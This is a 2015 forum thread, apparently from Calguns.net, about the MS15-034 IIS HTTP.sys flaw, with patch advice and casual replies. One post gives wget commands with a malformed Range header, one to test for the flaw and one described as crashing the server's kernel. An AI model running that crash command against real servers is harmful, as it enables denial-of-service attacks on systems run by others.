Unconfigured Ad Widget

Collapse

MS IIS http ping of death

Collapse
X
Collapse
 
  • Page of 1
  • Time
  • Show
Clear All
new posts
Previous template Next
  • #1
    ocabj
    Calguns Addict
    • Oct 2005
    • 7924

    MS IIS http ping of death

    I hope you all patched any IIS web servers in your infrastructure.

    Sysadmins, patch now: HTTP 'pings of death' are spewing across web to kill Windows servers
    http://www.theregister.co.uk/2015/04/16/http_sys_exploit_wild_ms15_034/
    : Patch Tuesday bug reverse engineered by Thursday


    We made the decision to patch the day of release, given the fact that it only required sending a malformed web request to an exploitable server.

    https://ma.ttias.be/remote-code-execution-via-http-request-in-iis-on-windows/

    Distinguished Rifleman #1924
    NRA Certified Instructor (Rifle and Metallic Cartridge Reloading) and RSO
    NRL22 Match Director at WEGC

    https://www.ocabj.net
    Tags: None
    • #2
      yellowsulphur
      Senior Member
      • May 2007
      • 1627
      "Ping of Death" now that's a term I haven't heard since Nirvana and Soundgarden.

        Comment

        • #3
          skunkbad
          Member
          • Nov 2012
          • 147
          IIS has been, and will continue to be, the easiest server to hack. I can tell you from personal experience, never ever host a website on IIS. If a knucklehead like me can gain access to every other user account on the server, then a pro hacker could do anything they want.

            Comment

            • #4
              Germz
              Vendor/Retailer
              • Apr 2013
              • 4691
              I just deny ICMP on my router.
              Retired Account

                Comment

                • #5
                  SkyHawk
                  I need a LIFE!!
                  • Sep 2012
                  • 23495
                  Originally posted by Germz
                  I just deny ICMP on my router.
                  Considering it is a http or https get request that crashes the kernel, I don't think this will help at all It isn't a ping of death, it is a GET of death.

                  A simple WGET command will do it. You can either test or crash with it.

                  To test:
                  wget -O get.txt --header="Range: 0-18446744073709551615" http://8.8.8.8/

                  If you see 'Requested Header Range Not Satisfiable' either in the server response or the get.txt output file, you are probably vulnerable.

                  If you want to crash the kernel, simply change the string to:
                  wget -O get.txt --header="Range: 20-18446744073709551615" http://8.8.8.8/

                  Of course use your own IP instead of 8.8.8.8 - Google would probably appreciate it.
                  Last edited by SkyHawk; 04-18-2015, 8:55 PM.
                  Click here for my iTrader Feedback thread: https://www.calguns.net/forum/market...r-feedback-100

                    Comment

                    • #6
                      ocabj
                      Calguns Addict
                      • Oct 2005
                      • 7924
                      Originally posted by Germz
                      I just deny ICMP on my router.
                      As indicated, this isn't a true "ping of death". It is sending a malformed web request to an IIS server. It's a quasi ping of death in that the malicious actor doesn't care about the ack / return packet from the server.

                      Note: You'll need to re-think how you address ICMP, since ICMP is used for a lot more when it comes to IPv6 networking. Blindly blocking all ICMP on IPv6 will actually prevent IPv6 from properly routing.

                      Distinguished Rifleman #1924
                      NRA Certified Instructor (Rifle and Metallic Cartridge Reloading) and RSO
                      NRL22 Match Director at WEGC

                      https://www.ocabj.net

                        Comment

                        • #7
                          71MUSTY
                          Calguns Addict
                          • Mar 2014
                          • 7029
                          I guess there is a reason my server is still an old model with the hand crank on the front,
                          Only slaves don't need guns

                          Originally posted by epilepticninja
                          Americans vs. Democrats
                          We stand for the Anthem, we kneel for the cross


                          We already have the only reasonable Gun Control we need, It's called the Second Amendment and it's the government it controls.

                          What doesn't kill me, better run

                            Comment

                            Previous template Next

                            Calguns.net Statistics

                            Collapse
                            Topics: 1,861,293   Posts: 25,079,455   Members: 355,415   Active Members: 5,485
                            Welcome to our newest member, scentedtrunk.

                            What's Going On

                            Collapse

                            There are currently 5889 users online. 121 members and 5768 guests.

                            Most users ever online was 65,177 at 8:20 PM on 09-21-2024.

                            Working...
                            UA-8071174-1